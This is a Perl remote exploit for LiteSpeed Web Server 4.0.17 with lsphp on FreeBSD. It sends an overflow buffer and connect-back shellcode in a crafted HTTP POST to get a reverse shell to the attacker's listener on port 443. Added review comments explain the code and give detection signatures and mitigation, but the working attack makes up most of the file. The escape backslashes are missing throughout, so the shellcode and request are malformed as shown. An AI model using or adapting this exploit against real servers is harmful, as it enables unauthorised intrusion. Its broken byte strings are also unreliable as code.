# Title : LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD
# Published : 2010-12-10
# Author : Kingcope
# LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD
# bug discovered & exploited by Kingcope
#
# Dec 2010
# Lame Xploit Tested with success on
# FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86
# FreeBSD 6.3-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86
# FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.15 Standard x86
# can be used against the admin interface (port 7080), too
# Xploit only works on the default lsphp binary, not the compiled version
#
# this should be exploitable on linux too (on the compiled SAPI version)
# the shipped linux version of lsphp has stack cookies enabled,
# which could be brute forced if there wasn't a null byte placed at the end of
# the exploit buffer. The compiled SAPI version is exploitable, but then
# the offsets differ from box to box, so this time FreeBSD targets only.
# thus on linux this is very tricky to exploit.
# this is a proof of concept, don't try this on real boxes
# see lsapilib.c line 1240
(http://litespeedtech.com/packages/lsapi/php-litespeed-5.4.tgz)
use IO::Socket;
# Unbuffered STDOUT, so whatever the target socket returns (relayed at the
# bottom of the script) is shown as it arrives.
# NOTE(review): the script has no `use strict; use warnings;` and every
# variable below is a package global.
$|=1;
#freebsd reverse shell port 443
#setup a netcat on this port ^^
# Payload string for the FreeBSD/x86 target. Per the author's inline comments
# it drops privileges with setreuid (so the resulting shell runs as the lsphp
# user, not root), connects back to the listener, and then spawns a shell --
# the "x2fx2fx73x68" / "x2fx62x69x6e" bytes spell "//sh" and "/bin".
# Bytes 37..40 are later overwritten with the listener's IPv4 address (see the
# substr() call after argument parsing); the "x41x41x41x41" run next to the
# port bytes is presumably the placeholder that patch is meant to hit.
# NOTE(review): as reproduced on this page the escape backslashes are absent,
# so these literals are plain ASCII text rather than the intended byte values.
$bsdcbsc =
# setreuid, no root here
"x31xc0x31xc0x50x31xc0x50xb0x7ex50xcdx80".
# connect back :>
"x31xc0x31xdbx53xb3x06x53".
"xb3x01x53xb3x02x53x54xb0".
"x61xcdx80x31xd2x52x52x68".
# 4-byte address placeholder, followed by the hard-coded port (443 = 0x01bb)
"x41x41x41x41x66x68x01xbb".
"xb7x02x66x53x89xe1xb2x10".
"x52x51x50x52x89xc2x31xc0".
"xb0x62xcdx80x31xdbx39xc3".
"x74x06x31xc0xb0x01xcdx80".
"x31xc0x50x52x50xb0x5axcd".
"x80x31xc0x31xdbx43x53x52".
"x50xb0x5axcdx80x31xc0x43".
"x53x52x50xb0x5axcdx80x31".
"xc0x50x68x2fx2fx73x68x68".
"x2fx62x69x6ex89xe3x50x54".
"x53x50xb0x3bxcdx80x31xc0".
"xb0x01xcdx80";
# Print the banner and usage text to STDOUT, then terminate the process.
# Called when the argument count is wrong. NOTE(review): the trailing "n"
# characters are "\n" escapes whose backslashes are missing as reproduced
# here, and the empty `()` prototype serves no purpose in a sub called as
# a bareword statement.
sub usage() {
    my $banner = "written by kingcopen";
    my @usage_parts = (
        "usage:n",
        "litespeed-remote.pl <target ip/host> <target port>
<your ip> <php file on remote host>nn",
        "example:n",
        "perl litespeed-remote.pl 192.168.2.3 8088
192.168.2.2 phpinfo.phpnn",
    );
    print $banner;
    print join('', @usage_parts);
    exit;
}
# Argument handling: exactly four positional arguments are required.
# NOTE(review): `ne` is a string comparison; it happens to work because
# $#ARGV stringifies to "3", but `!=` is the numeric idiom.
if ($#ARGV ne 3) { usage; }
$target = $ARGV[0];   # victim host
$port = $ARGV[1];     # victim port (the header says the admin port, 7080, also works)
$cbip = $ARGV[2];     # host the payload connects back to (listener on port 443)
$file = $ARGV[3];     # existing PHP file on the victim, appended to the request path
# gethostbyname() in scalar context yields the packed 4-byte IPv4 address and
# split(//, ...) breaks it into four 1-byte strings.
# NOTE(review): an unresolvable name yields undef here; the split then returns
# an empty list and the substr() below replaces 4 bytes with "" (i.e. deletes
# them), silently corrupting the payload instead of failing.
($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));
# Patch the callback address into the payload at byte offset 37 -- presumably
# the address field of the sockaddr the connect-back stub pushes.
# NOTE(review): as reproduced on this page the payload's escape backslashes
# are missing, so this offset no longer lands on the "x41x41x41x41" run.
substr($bsdcbsc, 37, 4, $a1 . $a2 . $a3 . $a4);
#my $sock = IO::Socket::INET->new(PeerAddr => $target,
# PeerPort => 8088,
# Proto => 'tcp');
#$a = "A" x 500;
#print $sock "POST /phpinfo.php HTTP/1.1rnHost: 192.168.2.5rnrn";
#$x = <stdin>;
#$ret = pack("V", 0x28469478); # FreeBSD 7.3-RELEASE
#$ret = pack("V", 0x82703c0); # FreeBSD 6.3-RELEASE
# Return address written into the overflow buffer: a JMP EDX gadget inside the
# shipped lsphp binary (author's comment). The commented-out values above are
# the per-release alternatives the author tried; the header notes this only
# works on the default lsphp binary, so a rebuilt LSAPI shifts the address.
$ret = pack("V", 0x080F40CD); # JMP EDX lsphp
# NOTE(review): the constructor's return value is not checked; a refused
# connection leaves $sock undef and the print below dies with an obscure
# error instead of a clear "connect failed" message.
my $sock = IO::Socket::INET->new(PeerAddr => $target,
PeerPort => $port,
Proto => 'tcp');
# Overflow buffer: 263 filler bytes plus 24 more, then the packed return
# address, then 500 bytes of padding.
# NOTE(review): `$a` is the package variable sort() aliases its comparator
# operands to; a lexical (`my $buf`) would avoid that clash.
$a = "A" x 263 . "AAAA" x 6 . $ret . "C" x 500;
# 3000-byte NOP sled placed in front of the patched payload.
$sc = "x90" x 3000 . $bsdcbsc;
# One raw HTTP POST. The request path begins with six NOP bytes and what looks
# like a short relative jump (xeb x50), followed by "/../$file"; the sled and
# payload ride in a bogus "VVVV:" header and the overflow buffer sits in a
# second bogus header, "KINGCOPEH4XXU:". The header comment points at
# lsapilib.c line 1240 as the code that mishandles this.
# Detection: a request line carrying non-printable bytes, the "/../" in front
# of an otherwise valid PHP path, and the literal header names "VVVV:" and
# "KINGCOPEH4XXU:" are all strong signatures in access and WAF logs.
# Mitigation: move to a fixed LSAPI/LiteSpeed build (version not given here);
# because the payload drops to the lsphp user, running PHP under a dedicated
# low-privilege account bounds what a successful overflow can reach.
# NOTE(review): as reproduced here the "\r\n" and "\x" backslashes are gone,
# so the literal is not a well-formed HTTP message; "$targetrnVVVV" and
# "$scrn" would even be parsed as (undefined) variable names.
print $sock "POST /x90x90x90x90x90x90xebx50/../$file?
HTTP/1.1rnHost: $targetrnVVVV: $scrn$a KINGCOPEH4XXU:rnrn";
# Relay whatever the server sends back. On success the author expects the
# shell on the separate port-443 listener, not on this socket.
while (<$sock>) {
print;
}